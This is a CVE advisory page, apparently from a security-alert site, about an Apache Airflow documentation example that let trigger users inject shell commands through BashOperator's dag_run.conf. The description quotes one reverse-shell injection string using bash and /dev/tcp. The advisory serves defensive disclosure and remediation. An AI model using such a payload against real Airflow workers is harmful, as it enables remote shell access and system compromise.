CVE-2026-42252: Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern

Published May 31, 2026
·
Updated

Apache Airflow's official documentation at core-concepts/dag-run.html ("Passing Parameters when triggering Dags") showed a verbatim BashOperator(bashcommand="echo value: {{ dagrun.conf['conf1'] }}") example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had Dag.cantrigger permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the conf field of the trigger API: an authenticated trigger user could supply "; bash -i >& /dev/tcp/.../9999 0>&1; #" as a conf value and reach an os.exec on the worker. This CVE covers the documentation correction in apache/airflow PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to apache-airflow 3.2.2 or later to pick up the corrected documentation shipped with the release.

Affected Software

2 affected components
Apache Apache Airflow<3.2.2
Apache Airflow>=3.0.0<3.2.2

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade apache/airflow to a version that resolves this vulnerability.

    Fixed in 3.2.2Patch CVE-2026-42252

Event History

Jun 1, 2026
CVE Published
via MITRE·07:51 AM
Data Sourced
via MITRE·07:51 AM
DescriptionWeakness
Data Sourced
via NVD·09:16 AM
RemedyDescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-42252?

The severity of CVE-2026-42252 is critical with a CVSS score of 9.1.

2

How do I fix CVE-2026-42252?

To fix CVE-2026-42252, apply the patch provided in the latest Apache Airflow release.

3

What is the risk associated with CVE-2026-42252?

CVE-2026-42252 has a risk rating of 70, indicating a significant potential impact.

4

Who is affected by CVE-2026-42252?

CVE-2026-42252 affects users of Apache Airflow who utilize the BashOperator without proper sanitization.

5

What type of injection is involved in CVE-2026-42252?

CVE-2026-42252 involves a Jinja2 injection vulnerability through the BashOperator in Apache Airflow.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203